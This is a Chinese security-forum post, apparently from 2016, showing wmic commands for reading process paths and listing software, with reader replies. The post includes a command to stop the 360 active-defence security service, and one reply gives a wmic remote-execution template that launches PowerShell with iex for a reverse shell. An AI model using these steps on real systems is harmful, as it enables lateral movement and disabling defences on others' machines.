windows下可以通过wmic获取进程安装路径

2016-10-09 16:32:44 7 piaoye 4752

查询mysql路径：

wmic process where(description="mysqld.exe") >> mysql.log

输出到当前目录下

wmic process where(description="cmd.exe")

显示结果为：

附带两条

wmic service where caption="zhudongfangyu" call stopservice  

wmic service where name="zhudongfangyu" call stopservice

echo y|wmic process where processid=6428 call terminate  干掉pid

echo y|wmic process where name="SogouExplorer.exe" call terminate 干掉进程

类别渗透测试

关于作者

piaoye35篇文章1202篇回复

piaoye

评论7次

要评论？请先登录或注册

7楼

grandis
2017-6-12 10:40

EMing：
wmic 渗透很强大，get 一些信息，经常用的还是wmic /node:ip /user:username /password:pass process call create "powershell -ep iex .... "直接反弹
回复|@ta
1

windows7上面执行这个wmic，目标是2008 R2，显示RPC不可用。 2008R2上面执行，目标win7，命令calc，看到进程里面有calc，但是没有弹出来。。。／大佬，是不是还要设置防火墙什么的

回复|@ta|踩(0)|顶(0)
6楼

EMing
2017-6-9 22:37

wmic 渗透很强大，get 一些信息，经常用的还是wmic /node:ip /user:username /password:pass process call create "powershell -ep iex .... "直接反弹

回复|@ta|踩(0)|顶(0)
5楼

grandis
2017-6-9 11:44

wmic process where(description="cmd.exe") get executablepath

回复|@ta|踩(0)|顶(0)
4楼

Woodisgood!
2016-10-9 23:09

附送：获取进程路径： wmic process get description,executablepath 查看安装的软件： wmic product get name,version wmic product list brief

回复|@ta|踩(0)|顶(0)
3楼

zoonctrl
2016-10-9 22:03

这个我已经知道了，不过还是谢谢你。你这种方法是否可以输出合适的格式，我试试再看看。

回复|@ta|踩(0)|顶(0)
2楼

evildns
2016-10-9 17:52

让我想起了那个内网渗透的vbs

回复|@ta|踩(0)|顶(0)
1楼

未知数
2016-10-9 17:01

曾经用wmic重启了同学的电脑，很有意思。

回复|@ta|踩(0)|顶(0)